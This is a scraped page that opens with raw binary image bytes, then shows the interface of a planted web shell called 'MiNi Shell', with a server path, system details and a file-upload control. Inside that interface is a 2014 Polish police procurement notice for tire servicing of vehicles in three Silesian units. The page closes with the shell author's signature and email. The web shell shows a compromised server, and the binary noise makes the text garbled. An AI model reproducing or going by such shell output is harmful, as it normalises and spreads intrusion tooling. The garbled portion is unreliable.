JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140428/143138-N-2014.html

<p class="kh_header"><b>Katowice: ZP-2380-160,181,182-22/2014 Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego</b><br>
<b>Numer ogłoszenia: 143138 - 2014; data zamieszczenia: 28.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP-2380-160,181,182-22/2014 Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego. Jest to zamówienie udzielane w częściach a niniejsze zamówienie obejmuje trzy zadania:
Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Żory
adres: 44-240 Żory ul. Wodzisławska 3
Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Myszków
adres: 42-300 Myszków, ul. Kościuszki 105
Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Wodzisław Śląski
adres: 44-313 Wodzisław Śląski ul. Kokoszycka 180 b
2. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, tj.: pojazdów osobowych i typu furgon (w tym samochodów osobowych terenowych), będących na stanie ww jednostek
2.1 Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne, naprawę kół, wyważanie kół i wymianę kół.
2.2 Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie danej jednostki terenowej: 
Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Żory:
18 szt pojazdów osobowych i 5 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ
Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Myszków
17 szt pojazdów osobowych i 5 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 4 do SIWZ
Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Wodzisław Śląski
30 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 5 do SIWZ
2.3 Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. Zamawiający zastrzega, że ilość pojazdów w trakcie trwania umowy może ulec zmianie.
2.4 Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia znajdują się w załączniku nr 2 do SIWZ - Umowa projekt
3. Zamawiający wymaga aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacja obsługi) był zlokalizowany w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej tj.
Dla zadania nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Żory,
adres: 44-240 Żory ul. Wodzisławska 3
Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Myszków,
adres: 42-300 Myszków, ul. Kościuszki 105
Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Wodzisław Śląski, adres: 44-313 Wodzisław Śląski ul. Kokoszycka 180 b
3.1 Zamawiający wymaga aby Wykonawca wskazał w ofercie dokładny adres (kod pocztowy, miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacji obsługi) dla danego zadania.
3.2 Zamawiający dokona oceny spełniania wymagania za pomocą programu www.zumi.pl tj. w zakładce (wyznaczenie trasy) zostanie uruchomiona zakładka (własny transport) po czym w pozycji 1 zostanie wpisany adres miejsca świadczenia usługi, a w pozycji 2 miejsca siedziby jednostki terenowej
dla zadania nr 1 - KMP Żory - adres: 44-240 Żory, ul. Wodzisławska 3
dla zadania nr 2 - KPP Myszków - adres: 42-300 Myszków, ul. Kościuszki 105
dla zadania nr 3 - KPP Wodzisław Śląski - adres: 44-313 Wodzisław Śląski ul. Kokoszycka 180 b
3.3 Oferty w których odległość punktu usługowego (stacji obsługi) od siedziby jednostki terenowej (KMP Żory, KPP Myszków, KPP Wodzisław Śląski) będzie przekraczała 5 km liczonych po trasie zostaną uznane za niezgodne z wymaganiami SIWZ i odrzucone na podstawie art. 89 ust. 1 pkt 2 ustawy Prawo Zamówień Publicznych.
4. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania posiadał odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
5. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania był czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
6. Zamawiający wymaga aby ceny jednostkowe netto podane w ofercie dla danego zadania nie uległy zmianie i obowiązywały przez cały okres umowy. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
7. Zamawiający informuje, iż na etapie badania i oceny ofert będzie przeliczał dla każdego zadani osobno ceny jednostkowe podane w ofertach przez szacunkowe ilości usług podane w załącznikach: nr 3 do SIWZ dla zadania nr 1, nr 4 DO SIWZ dla zadania nr 2 i nr 5 DO SIWZ dla zadania 3. Jeżeli wyliczona kwota dla danego zadania będzie wyższa od kwoty jaką Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia dla danego zadania, Zamawiający uzna, iż cena oferty dla danego zadania przewyższa kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia dla danego zadania.
8. Umowa w niniejszym postępowaniu zostanie zawarta na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia, a podaną w trakcie otwarcia ofert. 
9. Cenę brutto dla danego zadania obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.
10. Rozliczenie za zrealizowane usługi będzie następować wg cen jednostkowych każdej pozycji wskazanych w tabelach załącznika nr 1 do SIWZ - formularzu ofertowym dla danego zadania.
11. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom dla danego zadania. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował Wykonawca przy jego/ich udziale dla danego zadania. W przypadku braku oświadczenia Zamawiający uzna, iż Wykonawca wykona zamówienie bez udziału podwykonawców..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Wskazanie adresu dla danego zadania (należy podać dokładny adres: kod pocztowy, miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia  (stacji obsługi) zlokalizowanego w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej KMP Żory i/lub KPP Myszków i/lub KPP Wodzisław Śląski - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.
2. Oświadczenie Wykonawcy, że punkt usługowy dla danego zadania pod wskazanym adresem posiada odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.
3. Oświadczenie Wykonawcy, że punkt usługowy dla danego zadania pod wskazanym adresem będzie czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.
4. Oświadczenie Wykonawcy, że ceny jednostkowe netto podane w ofercie dla danego zadania nie ulegną zmianie i będą obowiązywały przez cały okres umowy - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia dla danego zadania Wykonawca wskaże zakres jaki będzie realizował przy jego/ich udziale - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia dotyczące realizacji zamówienia są zawarte w załączniku nr 2 do SIWZ - projekt umowy.
2. Jednocześnie w myśl art. 144 ust. 1 ustawy PZP Zamawiający dopuszcza możliwość zmian postanowień umowy w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia o wielkość tej stawki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.katowice.kwp.policja.gov.pl/KWK/zamowienia-publiczne/katalog-zamowien-publi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Katowicach
Zespół Zamówień Publicznych
40-038 Katowice ul. J. Lompy 19
blok C, piętro VII, pokój 735.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2014 godzina 10:00, miejsce: Komenda Wojewódzka Policji w Katowicach
Zespół Zamówień Publicznych
40-038 Katowice ul. J. Lompy 19
blok C, piętro VII, pokój 735.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Żory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Żory:
18 szt pojazdów osobowych i 5 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Myszków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Myszków
17 szt pojazdów osobowych i 5 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 4 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Wodzisław Śląski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Wodzisław Śląski
30 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 5 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com